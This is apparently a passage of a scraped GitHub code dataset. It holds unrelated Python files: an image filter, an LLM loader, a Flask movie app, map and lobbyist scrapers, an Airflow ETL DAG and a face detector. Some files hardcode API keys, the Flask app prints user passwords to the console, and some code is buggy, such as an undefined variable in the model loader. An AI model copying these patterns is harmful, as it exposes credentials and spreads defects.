err_msg += f'{p}\\n'\n if (err_ctn_missing + err_ctn_duplicates):\n Logs.error(err_msg)\n self.generator.bld.fatal('There are include errors.')\n else:\n self.outputs[0].write(f'wscript: \"{self.inputs[0]}\"\\n')\n if incs:\n self.outputs[0].write('includes:\\n - \"', 'a')\n self.outputs[0].write('\"\\n - \"'.join(incs) + '\"\\n', 'a+')\n else:\n self.outputs[0].write('includes:\\n', 'a+')\n\n\n@TaskGen.feature('check_includes')\n@TaskGen.before('process_rule')\ndef add_check_includes(self):\n src = self.path.make_node('wscript')\n tgt = src.change_ext('.includes.yml')\n self.create_task('tsk_check_includes', src=src, tgt=tgt)\n\n\nclass copy_libs(Task.Task):\n def keyword(self):\n return 'Copying'\n\n def run(self):\n import shutil\n shutil.copyfile(self.inputs[0].abspath(), self.outputs[0].abspath())\n\n\n@TaskGen.feature('copy_libs')\n@TaskGen.after('apply_link')\ndef add_copy_libs(self):\n if getattr(self, 'link_task', None) is None:\n return\n\n for src in self.link_task.outputs:\n tgt = os.path.normpath(src.abspath())\n tgt = os.path.join(self.env.LIB_DIR_LIBS, os.path.basename(tgt))\n tgt = self.path.find_or_declare(tgt)\n self.create_task('copy_libs', src=src, tgt=tgt)\n","repo_name":"foxBMS/foxbms-1","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":38571,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"40"} +{"seq_id":"6073122396","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('12345.jfif', 0)\nplt.imshow(image, cmap='gray'), plt.axis('off')\nplt.show()\nM, N = image.shape\nP, Q = 2*M, 2*N\n# Zero padding\npadded_image = np.zeros((P, Q))\npadded_image[:M, :N] = image\npadded_image_new = np.zeros((P, Q))\n# Centering\nfor x in range(P):\n for y in range(Q):\n padded_image_new[x, y] = padded_image[x, y] * ((-1) ** (x + y))\n\ndft2d = np.fft.fft2(padded_image_new)\ndft2d_ = np.log(np.abs(dft2d))\n# Homomorphic filtering 구현\ndef HMMF(image, cutoff, rh, rl):\n M, N = image.shape\n H, D = np.zeros((M, N)), np.zeros((M, N))\n\n U0 = int(M/2)\n V0 = int(N/2)\n D0 = cutoff\n\n A, B = rh, rl\n\n for u in range(M):\n for v in range(N):\n u2 = np.power(u, 2)\n v2 = np.power(v, 2)\n D[u, v] = np.sqrt(u2 + v2)\n\n for u in range(M):\n for v in range(N):\n u_ = np.abs(u - U0)\n v_ = np.abs(v - V0)\n H[u, v] = (A - B) * (1 - np.exp(-D[u_, v_] ** 2 / (2 * (D0 ** 2)))) + B\n# Gaussian High Pass Filter에 r_H, r_L 의 차를 곱하고 r_L을 더해 i(x, y)을 약화시키고 r(x, y)를 강화시켜 image details 강화\n return H\n\n\nhmmf = HMMF(dft2d, cutoff=30, rh=1.25, rl=0.75)\nplt.imshow(hmmf, cmap='gray'), plt.axis('off')\nplt.show()\n\nG = np.multiply(dft2d, hmmf)\ndft2d_ = np.log(np.abs(G))\nplt.imshow(dft2d_.real, cmap='gray'), plt.axis('off')\nplt.show()\n# Inverse Fast Fourier Transform\nidft2d = np.fft.ifft2(G)\n\n# De-centering\nfor x in range(P):\n for y in range(Q):\n idft2d[x, y] = idft2d[x, y] * ((-1) ** (x + y))\n# Remove zero-padding\nidft2d = idft2d[:M, :N]\nplt.imshow(idft2d.real, cmap='gray'), plt.axis('off')\nplt.show()\n","repo_name":"beaglemong/Video_System_Capstone_Design","sub_path":"homomorphic_filter.py","file_name":"homomorphic_filter.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14308974348","text":"import torch\nfrom peft import PeftModel\nfrom transformers import LlamaTokenizer, LlamaForCausalLM\n\nfrom auto_gptq import AutoGPTQForCausalLM, BaseQuantizeConfig\n\ndef load_model(\n base, \n finetuned, \n gptq,\n gptq_base,\n mode_cpu,\n mode_mps,\n mode_full_gpu,\n mode_8bit,\n mode_4bit,\n mode_gptq,\n mode_mps_gptq,\n mode_cpu_gptq,\n force_download_ckpt,\n local_files_only\n):\n tokenizer = LlamaTokenizer.from_pretrained(\n base,local_files_only=local_files_only\n )\n tokenizer.pad_token_id = 0\n tokenizer.padding_side = \"left\"\n\n if not multi_gpu:\n model = LlamaForCausalLM.from_pretrained(\n base,\n load_in_8bit=mode_8bit,\n load_in_4bit=mode_4bit,\n device_map=\"auto\",\n local_files_only=local_files_only\n )\n \n model = PeftModel.from_pretrained(\n model, \n finetuned, \n # force_download=force_download_ckpt,\n device_map={'': 0}\n )\n return model, tokenizer\n else:\n model = LlamaForCausalLM.from_pretrained(\n base,\n load_in_8bit=mode_8bit,\n load_in_4bit=mode_4bit, \n torch_dtype=torch.float16,\n device_map=\"auto\",\n local_files_only=local_files_only\n )\n \n model = PeftModel.from_pretrained(\n model, \n finetuned, \n # force_download=force_download_ckpt,\n torch_dtype=torch.float16\n )\n model.half()\n return model, tokenizer \n\n","repo_name":"deep-diver/LLM-As-Chatbot","sub_path":"models/llama_rlhf.py","file_name":"llama_rlhf.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":3121,"dataset":"github-code","pt":"40"} +{"seq_id":"14615330378","text":"import os\nimport sys\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n # Write your code here.\n # Slice parts of the time\n ap = s[len(s)-2:len(s)]\n hour = s[ : 2]\n minute = s[3 : 5]\n secs = s[6 : 8]\n if ap == \"PM\" and hour != \"12\":\n return(\"{}:{}:{}\".format(int(hour)+12, minute, secs))\n elif ap == \"AM\" and hour == \"12\":\n return(\"00:{}:{}\".format(minute, secs))\n else:\n return(\"{}:{}:{}\".format(hour, minute, secs))\n\n\nprint(timeConversion(\"11:05:45PM\"))","repo_name":"josenriagu/fluffy-fiesta","sub_path":"_hackerrrank/timeConversion.py","file_name":"timeConversion.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29235012471","text":"import torch\n\ndef mask_iou(lhs_mask, rhs_mask):\n r\"\"\"Compute the Intersection over Union of two segmentation masks.\n\n Args:\n lhs_mask (torch.FloatTensor):\n A segmentation mask, of shape\n :math:`(\\text{batch_size}, \\text{height}, \\text{width})`.\n rhs_mask (torch.FloatTensor):\n A segmentation mask, of shape\n :math:`(\\text{batch_size}, \\text{height}, \\text{width})`.\n\n Returns:\n (torch.FloatTensor): The IoU loss, as a torch scalar.\n \"\"\"\n batch_size, height, width = lhs_mask.shape\n assert rhs_mask.shape == lhs_mask.shape\n sil_mul = lhs_mask * rhs_mask\n sil_add = lhs_mask + rhs_mask\n iou_up = torch.sum(sil_mul.reshape(batch_size, -1), dim=1)\n iou_down = torch.sum((sil_add - sil_mul).reshape(batch_size, -1), dim=1)\n iou_neg = iou_up / (iou_down + 1e-10)\n mask_loss = 1.0 - torch.mean(iou_neg)\n return mask_loss\n","repo_name":"NVIDIAGameWorks/kaolin","sub_path":"kaolin/metrics/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":3989,"dataset":"github-code","pt":"40"} +{"seq_id":"20600701492","text":"\"\"\"Server for movie ratings app.\"\"\"\n\nfrom flask import(Flask,render_template,request,flash,session,redirect)\nfrom model import connect_to_db\nimport crud\nfrom jinja2 import StrictUndefined\n\napp = Flask(__name__)\napp.secret_key = \"dev\"\napp.jinja_env.undefined = StrictUndefined\n\n\n# Replace this with routes and view functions!\n@app.route('/')\ndef homepage():\n '''View homepage'''\n return render_template('homepage.html')\n\n@app.route('/movies')\ndef all_movies():\n movies = crud.get_all_movies()\n return render_template('all_movies.html',movies=movies)\n\n\n@app.route('/movies/')\ndef show_movie(movie_id):\n \"\"\"Show details on a particular movie.\"\"\"\n\n movie = crud.get_movie_by_id(movie_id)\n\n return render_template('movie_details.html', movie=movie)\n\n\n@app.route('/users')\ndef all_users():\n users = crud.get_all_users()\n return render_template('all_users.html',users=users)\n\n@app.route('/users',methods=['POST'])\ndef register_user(): \n '''Create new user if user does not exists already'''\n email = request.form.get('email')\n pwd = request.form.get('password') \n print(email)\n print(pwd)\n user = crud.get_user_by_email(email)\n print(user)\n if user:\n flash('This email is already used.Try with different email')\n else:\n crud.create_user(email,pwd)\n flash('Account created!Please log in')\n return redirect('/')\n\n\n\n\n@app.route('/users/')\ndef show_user(user_id):\n \"\"\"Show details on a particular User.\"\"\"\n\n user = crud.get_user_by_id(user_id)\n\n return render_template('user_details.html', user=user)\n\nif __name__ == '__main__':\n connect_to_db(app)\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"Supreethamg/Movie-Ratings-App","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71794549240","text":"import os\nfrom . import pblChk\nfrom shared import verbose\n\n\n#Processes publish options arriving from the different publish modules\n\n\n#######################GENERIC PUBLISHING OPTIONS PROCESSING########################\n####################################################################################\n#processes publish options and naming convention variables\ndef prc(pblTo, subset, assetType, prefix, convention, suffix):\n\tassetPblName = prefix + convention + suffix\n\t#if subset:\n\tassetDir = os.path.join(assetType, subset, convention)\n\t#else:\n\t#\tassetDir = os.path.join(assetType, assetPblName)\n\tpblDir = os.path.join(pblTo, assetDir)\n\treturn assetPblName, assetDir, pblDir\n\n\n###################RENDER PUBLISHING SPECIFIC OPTIONS PROCESSING####################\n####################################################################################\n#splits a sequence file and returns the different render components\ndef render_split(filename):\n#\tif filename.startswith('.'):\n#\t\treturn\n#\tif not pblChk.paddingChk(filename):\n#\t\treturn\n#\tnameBody, padding, extension = filename.split('.')\n#\treturn nameBody, padding, extension\n\n\t# Parse filename\n\ttry:\n\t\tbase, ext = os.path.splitext(filename)\n\t\tprefix, framenumber = base.rsplit('.', 1)\n\t\tpadding = len(framenumber)\n\t\tframenumber_int = int(framenumber)\n\t\treturn prefix, framenumber, ext\n\texcept ValueError:\n\t\tverbose.error(\"Could not parse sequence.\")\n\t\treturn # False, False, False # need to return tuple to match successful return type\n\n\n#processes a dictionary contaning the format layer_pass:full/sequence/path. Returns the path with the old file name and with the name convention applied\ndef renderName_prc(key, convention, file_):\n\t\tfile_split = render_split(file_)\n\t\tif file_split:\n\t\t\tprcFile = file_.replace(key, convention)\n\t\t\treturn prcFile\n\t\telse:\n\t\t\treturn\n\t\t\n#processes the provided render path and returns a dictionary of layer and respective full sequence path\ndef renderPath_prc(renderPath):\n\texpRenderPath = os.path.expandvars(renderPath)\n\tdirContents = sorted(os.listdir(expRenderPath))\n\trenderDic = {}\n\tseqChkLs = []\n\tfor content in dirContents:\n\t\ttry:\n\t\t\texpLayerPath = os.path.join(expRenderPath, content)\n\t\t\tif os.path.isdir(expLayerPath):\n\t\t\t\tif content not in renderDic.keys():\n\t\t\t\t\tfileContentLs = os.listdir(expLayerPath)\n\t\t\t\t\tfor file_ in fileContentLs:\n\t\t\t\t\t\tif pblChk.paddingChk(file_):\n\t\t\t\t\t\t\trenderDic[content] = os.path.join(renderPath, content)\n\t\t\t\t\t\t\tif content in seqChkLs:\n\t\t\t\t\t\t\t\tseqChkLs.remove(content)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif content not in seqChkLs:\n\t\t\t\t\t\t\t\tseqChkLs.append(content)\n\t\texcept TypeError:\n\t\t\tcontinue\n\t\t\t\n\tif len(seqChkLs) > 0:\n\t\tverbose.noSeq(seqChkLs)\n\t\t\t\t\n\tif not renderDic:\n\t\treturn\n\telse:\n\t\treturn renderDic\n\t\t\t\n\t\t\n####################DAILY PUBLISHING SPECIFIC OPTIONS PROCESSING####################\n####################################################################################\n\ndef dailyPath_prc(path):\n\t\"\"\" Processes the provided path and returns a dictionary of layer and respective full sequence path.\n\t\tRewrite or remove this function...\n\t\"\"\"\n\texpPath = os.path.expandvars(path)\n\tfilePath, file_ = os.path.split(expPath)\n\tfileSplit = render_split(file_)\n\trenderDic = {}\n\tif fileSplit:\n\t\tnameBody, padding, extension = render_split(file_)\n\t\trenderDic[nameBody] = filePath\n\t\t#print(nameBody, padding, extension)\n\t\treturn renderDic\n\telse:\n\t\treturn\n\n","repo_name":"mjbonnington/icarus-gps","sub_path":"publish/pblOptsPrc.py","file_name":"pblOptsPrc.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25248965003","text":"from urllib.parse import quote\nfrom urllib import request\nimport os\nos.system('pip install json')\nos.system('pip install xlwt')\nos.system('pip install xlrd')\nos.system('pip install xlutils')\nimport json\nimport xlwt\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\nimport winreg\n\n#获取桌面地址\nregkey=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\npath=winreg.QueryValueEx(regkey, \"Desktop\")[0]+'\\\\'\n\n#下面的这三行可以修改,第一行可以改成你自己申请的key,第二行是城市,第三行是关键词\namap_web_key = '2d68d475f1032ee055a9efa1f8bbf119'\ncityname = \"绍兴\"\nclassfiled = \"培训机构\"+\"柯桥区\"\n#默认在桌面生成一个以城市命名的excel文件\nfilename = path + cityname + '.xls' \n#链接的网址\npoi_search_url = \"http://restapi.amap.com/v3/place/text\"\npoi_boundary_url = \"https://ditu.amap.com/detail/get/detail\"\n \n \n# 根据城市名称和分类关键字获取poi数据\ndef getpois(cityname, keywords):\n i = 1\n poilist = []\n while True: # 使用while循环不断分页获取数据\n result = getpoi_page(cityname, keywords, i)\n result = json.loads(result) # 将字符串转换为json\n\t\t\n\t\t#后面的内容要根据所需获取的数据在json文件中的位置来\n if result['status'] is not '1':\n return\n if len(result['pois']) < 20:\n hand(poilist, result)\n write_to_excel(poilist, cityname, keywords)\n break\n hand(poilist, result)\n if i == 1:\n write_to_excel(poilist, cityname, keywords)\n else:\n contact_read_excel(poilist)\n i = i + 1\n return poilist\n \n \n# 追加数据到excel中\ndef contact_read_excel(poilist):\n rexcel = open_workbook(filename) # 用wlrd提供的方法读取一个excel文件\n rows = rexcel.sheets()[0].nrows # 用wlrd提供的方法获得现在已有的行数\n excel = copy(rexcel) # 用xlutils提供的copy方法将xlrd的对象转化为xlwt的对象\n table = excel.get_sheet(0) # 用xlwt对象的方法获得要操作的sheet\n # print('原有的行', rows)\n for i in range(len(poilist)):\n table.write(rows + i, 0, poilist[i]['id'])\n table.write(rows + i, 1, poilist[i]['name'])\n table.write(rows + i, 2, poilist[i]['address'])\n table.write(rows + i, 3, poilist[i]['location'])\n table.write(rows + i, 4, poilist[i]['tel'])\n table.write(rows + i, 5, poilist[i]['adname'])\n excel.save(filename) # xlwt对象的保存方法,这时便覆盖掉了原来的excel\n \n \n# 数据写入excel\ndef write_to_excel(poilist, cityname, classfield):\n # 一个Workbook对象,这就相当于创建了一个Excel文件\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)\n sheet = book.add_sheet(classfield, cell_overwrite_ok=True)\n # 第一行(列标题)\n sheet.write(0, 0, 'id')\n sheet.write(0, 1, 'name')\n sheet.write(0, 2, 'address')\n sheet.write(0, 3, 'location')\n sheet.write(0, 4, 'tel')\n sheet.write(0, 5, 'adname')\n for i in range(len(poilist)):\n sheet.write(i + 1, 0, poilist[i]['id'])\n sheet.write(i + 1, 1, poilist[i]['name'])\n sheet.write(i + 1, 2, poilist[i]['address'])\n sheet.write(i + 1, 3, poilist[i]['location'])\n sheet.write(i + 1, 4, poilist[i]['tel'])\n sheet.write(i + 1, 5, poilist[i]['adname'])\n book.save(filename)\n \n \n# 将返回的poi数据装入集合返回\ndef hand(poilist, result):\n # result = json.loads(result) # 将字符串转换为json\n pois = result['pois']\n for i in range(len(pois)):\n poilist.append(pois[i])\n \n \n# 单页获取pois\ndef getpoi_page(cityname, keywords, page):\n\t#链接的网址及一些参数\n req_url = poi_search_url + \"?key=\" + amap_web_key + '&extensions=all&keywords=' + quote(\n keywords) + '&city=' + quote(cityname) + '&citylimit=true' + '&offset=20' + '&page=' + str(\n page) + '&output=json'\n data = ''\n with request.urlopen(req_url) as f:\n data = f.read()\n data = data.decode('utf-8')\n return data\n \n \n# 获取城市分类数据\npois = getpois(cityname, classfiled)\n \nprint('写入成功')\n","repo_name":"zhr0115/python","sub_path":"高德poi搜索.py","file_name":"高德poi搜索.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2826989261","text":"import json\nimport psycopg2\nfrom psycopg2 import Error\nimport logging\nfrom airflow import DAG\nimport datetime as dt\nfrom textwrap import dedent\nimport requests as req\nfrom airflow.operators.python import PythonOperator\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\n# [START default_args]\n\ndefault_args = {\n 'owner': 'airflowproject',\n}\n# [END default_args]\n\n# [START instantiate_dag]\nwith DAG(\n 'final_project',\n default_args=default_args,\n description='ETL DAG',\n schedule_interval=dt.timedelta(minutes=5),\n start_date=dt.datetime(2022, 8, 5),\n catchup=False,\n tags=['test'],\n) as dag:\n # [END instantiate_dag]\n # [START documentation]\n dag.doc_md = __doc__\n # [END documentation]\n\n\n # [START extract_function]\n\n def data_load():\n res = req.get('https://apidata.mos.ru/v1/datasets/60865/rows?api_key=65a059a358b2497d6c87224f9d783c85')\n data = res.text\n\n data = data.replace('}},','},#').replace('}}','}').replace('[','').replace(']','').replace('\"Cells\":{','').split(',#')\n list_data =[]\n for i in range(len(data)):\n temp = json.loads(data[i])\n key = 'uniq_key'\n ts = dt.datetime.now()\n value = str(temp.get(\"global_id\")) + \"|\" + str(ts)\n temp[key] = value\n key2 = 'processed_time'\n temp[key2] = ts\n list_data.append(temp)\n\n connection = psycopg2.connect((\"\"\"\n host=rc1b-tsmgwzxf6kio2ajk.mdb.yandexcloud.net\n port=6432\n dbname=stg\n user=user1\n password=put_your_password\n target_session_attrs=read-write\n \"\"\"))\n cursor = connection.cursor()\n\n def insert_database(uniq_key, processed_time, global_id, Number, NominationYear, Name, Author, PubYear, AgeLimit, PublishingHouse, LitPrizeName, Nomination): \n \n \n insert_query = \"\"\" INSERT INTO stg_books (uniq_key, processed_time, global_id, number, nomitation_year, name, author, pub_year, age_limit, publishing_house, lit_prize_name, nomination) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n\n cursor.execute(insert_query, (uniq_key, processed_time, global_id, Number, NominationYear, Name, Author, PubYear, AgeLimit, PublishingHouse, LitPrizeName, Nomination))\n connection.commit()\n \n\n for i in range(len(list_data)):\n myjson = list_data[i]\n insert_database(myjson['uniq_key'], myjson['processed_time'], myjson['global_id'], myjson['Number'], myjson['NominationYear'], myjson['Name'], myjson['Author'], myjson['PubYear'], myjson['AgeLimit'], myjson['PublishingHouse'], myjson['LitPrizeName'], myjson['Nomination'])\n\n cursor.close()\n connection.close()\n\n # [START main_flow]\n extract_task = PythonOperator(\n task_id=\"data_load\",\n python_callable=data_load)\n \n# # [START main_flow]\n# load_task = PythonOperator(\n# task_id=\"insert_database\",\n# python_callable=insert_database)\n\ndata_load\n","repo_name":"MissBlumarine/automatic_pipeline","sub_path":"1.final_project_airflow_dag.py","file_name":"1.final_project_airflow_dag.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13857899007","text":"import cv2\n\nclass ssdface():\n def __init__(self, framework='caffe', threshold=0.7):\n if framework == 'caffe':\n self.net = cv2.dnn.readNetFromCaffe('ssdface/deploy.prototxt', 'ssdface/res10_300x300_ssd_iter_140000_fp16.caffemodel')\n else:\n self.net = cv2.dnn.readNetFromTensorflow('ssdface/opencv_face_detector_uint8.pb', 'ssdface/opencv_face_detector.pbtxt')\n self.conf_threshold = threshold\n self.framework = framework\n def detect(self, frame):\n frameOpencvDnn = frame.copy()\n frameHeight = frameOpencvDnn.shape[0]\n frameWidth = frameOpencvDnn.shape[1]\n if self.framework == 'caffe':\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], False, False)\n else:\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n self.net.setInput(blob)\n detections = self.net.forward()\n face_rois = []\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > self.conf_threshold:\n x1 = int(detections[0, 0, i, 3] * frameWidth)\n y1 = int(detections[0, 0, i, 4] * frameHeight)\n x2 = int(detections[0, 0, i, 5] * frameWidth)\n y2 = int(detections[0, 0, i, 6] * frameHeight)\n cv2.rectangle(frameOpencvDnn,(x1, y1), (x2, y2), (0, 0, 255), thickness=2)\n face_rois.append(frame[y1:y2, x1:x2])\n return frameOpencvDnn, face_rois\n def get_face(self, frame):\n frameOpencvDnn = frame.copy()\n frameHeight = frameOpencvDnn.shape[0]\n frameWidth = frameOpencvDnn.shape[1]\n if self.framework == 'caffe':\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], False, False)\n else:\n blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)\n self.net.setInput(blob)\n detections = self.net.forward()\n boxs, face_rois = [], []\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > self.conf_threshold:\n x1 = int(detections[0, 0, i, 3] * frameWidth)\n y1 = int(detections[0, 0, i, 4] * frameHeight)\n x2 = int(detections[0, 0, i, 5] * frameWidth)\n y2 = int(detections[0, 0, i, 6] * frameHeight)\n boxs.append((x1, y1, x2, y2))\n face_rois.append(frame[y1:y2, x1:x2])\n return boxs, face_rois\n\nif __name__ == \"__main__\" :\n ssdface_detect = ssdface(framework='caffe')\n imgpath = 's_l.jpg'\n srcimg = cv2.imread(imgpath)\n drawimg, face_rois = ssdface_detect.detect(srcimg)\n\n # _, face_rois = ssdface_detect.get_face(srcimg)\n # print('detect', len(face_rois), 'face')\n # for i, face in enumerate(face_rois):\n # cv2.namedWindow('face' + str(i), cv2.WINDOW_NORMAL)\n # cv2.imshow('face' + str(i), face)\n\n cv2.namedWindow('detect', cv2.WINDOW_NORMAL)\n cv2.imshow('detect', drawimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"hpc203/10kinds-light-face-detector-align-recognition","sub_path":"ssdface_detect_module.py","file_name":"ssdface_detect_module.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"40"} +{"seq_id":"38674989117","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom os import path\nimport os\nimport csv\n\n# Function to write the data to the appropriate filename\ndef write_to_csv(filename, data):\n\t#try statement to remove previous file before writing new file\n\ttry:\n\t\tos.remove(filename)\n\texcept OSError:\n\t\tpass\n\t\t\n\twith open(filename, 'a') as outcsv:\n\t\t#Specialized writer object to write to a csv file\n\t\twriter = csv.writer(outcsv, delimiter=',', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n\t\tfor row in data:\n\t\t\twriter.writerow(row)\n\toutcsv.close()\n\ndef extract_information(lines, year):\n\tspace_char = '\\xa0'\n\tdata = []\n\tcurrentCompany = \"\"\n\n\tnewLines = []\n\tfor line in lines:\n\t\tlineText = line.get_text()\n\t\tif lineText is not None:\n\t\t\tnewLines += lineText.split(\"\\n\")\n\n\tallRows = []\n\trow = ['State', 'StateAbbr', 'Year', 'Client', 'Lobbyist1', 'Lobbyist2', 'Lobbyist3', 'Lobbyist4', 'Lobbyist5', 'Lobbyist6', 'Lobbyist7', 'Lobbyist8', 'Lobbyist9', 'Lobbyist10', 'Lobbyist11', 'Lobbyist12']\t\t\n\tfor line in newLines:\n\t\tlistText = list(line)\n\t\tif len(listText) > 2:\n\t\t\tif listText[0] == space_char and (listText[1] != space_char and listText[1] != ' '):\n\t\t\t\tallRows.append(row)\n\t\t\t\tdel listText[0]\n\t\t\t\trow = [\"North Dakote\", \"ND\", year, \"\".join(listText)]\n\t\t\telif len(listText) > 11 and listText[10] == '#':\n\t\t\t\tname = \"\".join(listText[15:])\n\t\t\t\tname = name.replace('\\xa0', '')\n\t\t\t\tname = name.split(\", \")\n\n\t\t\t\tif len(name) < 2:\n\t\t\t\t\tname = \"\".join(name).split(\" \")\n\n\t\t\t\tif len(name) > 1:\n\t\t\t\t\trow.append(\"{} {}\".format(name[1], name[0]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(name[0])\n\n\treturn allRows\n\n\nif __name__ == \"__main__\":\n\t#Years 2012-2017, add more if need be\n\tyears = [2012, 2013, 2014, 2015, 2016]\n\n\tfor year in years:\n\t\tif year == 2016: #handle special url for 2016\n\t\t\turl = \"http://sos.nd.gov/lobbyists/registered-lobbyists/2016-organizations-lobbyists\"\n\t\t\tresponse = requests.get(url)\n\n\t\t\tsoup = BeautifulSoup(response.content, 'lxml')\n\t\t\tallDivs = soup.find_all(\"div\", {'class':None, 'id':None})\n\t\t\tdata = extract_information(allDivs, year)\n\t\telse:\n\t\t\turl = \"http://sos.nd.gov/lobbyists/registered-lobbyists/{}-organizations-listed-alphabetically-lobbyists\".format(year)\n\t\t\tresponse = requests.get(url)\n\n\t\t\tsoup = BeautifulSoup(response.content, 'lxml')\n\t\t\tallPs = soup.find_all(\"p\")\n\t\t\tdel allPs[0] #remove the first element since it is a descriptor\n\t\t\tdata = extract_information(allPs, year)\n\t\twrite_to_csv(\"../ND_{}.csv\".format(year), data)\n\t\tprint(\"Finished {}!!\".format(year))\n\n\t\t\t","repo_name":"ridersofrohan/State-Lobbying","sub_path":"ND/Python Scripts/gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29689208210","text":"import oy3opy.input as input\nfrom oy3opy.utils.string import string_width_fits\nfrom .core import View, Flow, Callable\n\nclass App(View):\n def __init__(self, flow:Flow, window, y = 0, x = 0, height = None, width = None, offset = 0, fullscroll = True, bottomscroll = True, afterRender:Callable=None):\n self.flow = flow\n\n ymax, xmax = window.getmaxyx()\n self.height = ymax if not height else height\n self.width = xmax if not width else width\n self.view = window.derwin(self.height, self.width, y, x)\n self.view.keypad(True) \n\n super().__init__(flow, self.height, offset)\n\n self.__screen_curs_min_y, self.__screen_curs_min_x = self.view.getbegyx()\n self.fullscroll = fullscroll\n self.bottomscroll = bottomscroll\n self.__stop = False\n if self.fullscroll:\n self.subscribe('full', lambda view: view.autoscroll())\n \n self.afterRender = afterRender\n\n def listen(self):\n input.onmouse(input.SCROLL_DOWN, self.handle_mouse)\n input.onmouse(input.SCROLL_UP, self.handle_mouse)\n self.subscribe('update', self.render)\n self.__stop = False\n def stop(self):\n input.offmouse(input.SCROLL_DOWN, self.handle_mouse)\n input.offmouse(input.SCROLL_UP, self.handle_mouse)\n self.unsubscribe('update', self.render)\n self.__stop = True\n def render(self, *args):\n if self.__stop:\n return\n if self.bottomscroll:\n try:\n self.scroll = ((len(self) == self.height) and (self.offset + len(self) == len(self.flow)))\n except:\n raise ValueError(f'{self.__len__()},{self.flow.__len__()}')\n\n for i, item in enumerate(self.window()):\n self.view.addstr(i, 0, string_width_fits(str(item), self.width - 1))\n self.view.clrtoeol()\n self.view.refresh()\n self.afterRender()\n\n def close(self):\n self.view.erase()\n self.view.refresh()\n\n def handle_mouse(self, y, x, type):\n if self.__stop:\n return\n if (self.__screen_curs_min_y <= y) and (y < self.__screen_curs_min_y+self.height) and (self.__screen_curs_min_x <= x) and (x < self.__screen_curs_min_x+self.width):\n if type == input.SCROLL_DOWN:\n self.curs_down()\n self.render()\n elif type == input.SCROLL_UP:\n self.curs_up()\n self.render()\n\n def __enter__(self):\n self.listen()\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n self.stop()\n self.close()\n","repo_name":"oy3o/dataflow","sub_path":"ternimal.py","file_name":"ternimal.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40277755524","text":"import pandas as pd\nfrom functools import reduce\nimport numpy as np\nclass dataset:\n def read_csv(csv_path):\n df = pd.read_csv(csv_path,infer_datetime_format=True)\n df_renamed = df.rename({'Reading Time (CST)':'Date'}, axis=1)\n if '0 to 5 cm Depth Average WFV (%)' in df_renamed: \n df_no_data_removed = df_renamed.loc[df_renamed['0 to 5 cm Depth Average WFV (%)'] != 'No Data']\n df_no_data_removed['0 to 5 cm Depth Average WFV (%)'] = pd.to_numeric(df_no_data_removed['0 to 5 cm Depth Average WFV (%)'], \n downcast=\"float\",\n errors ='coerce')\n df_no_data_removed = df_no_data_removed.rename({'0 to 5 cm Depth Average WFV (%)':'0-5cm Soil'},axis=1)\n\n if '0-5 cm Depth Average WFV (%)' in df_renamed:\n df_no_data_removed = df_renamed.loc[df_renamed['0-5 cm Depth Average WFV (%)'] != 'No Data']\n df_no_data_removed['0-5 cm Depth Average WFV (%)'] = pd.to_numeric(df_no_data_removed['0-5 cm Depth Average WFV (%)'],\n downcast=\"float\",\n errors='coerce')\n df_no_data_removed = df_no_data_removed.rename({'0-5 cm Depth Average WFV (%)':'0-5cm Soil'},axis=1)\n\n df_no_data_removed['Date'] = pd.to_datetime(df_no_data_removed['Date'], \n infer_datetime_format=True\n )\n return df_no_data_removed \n \n def 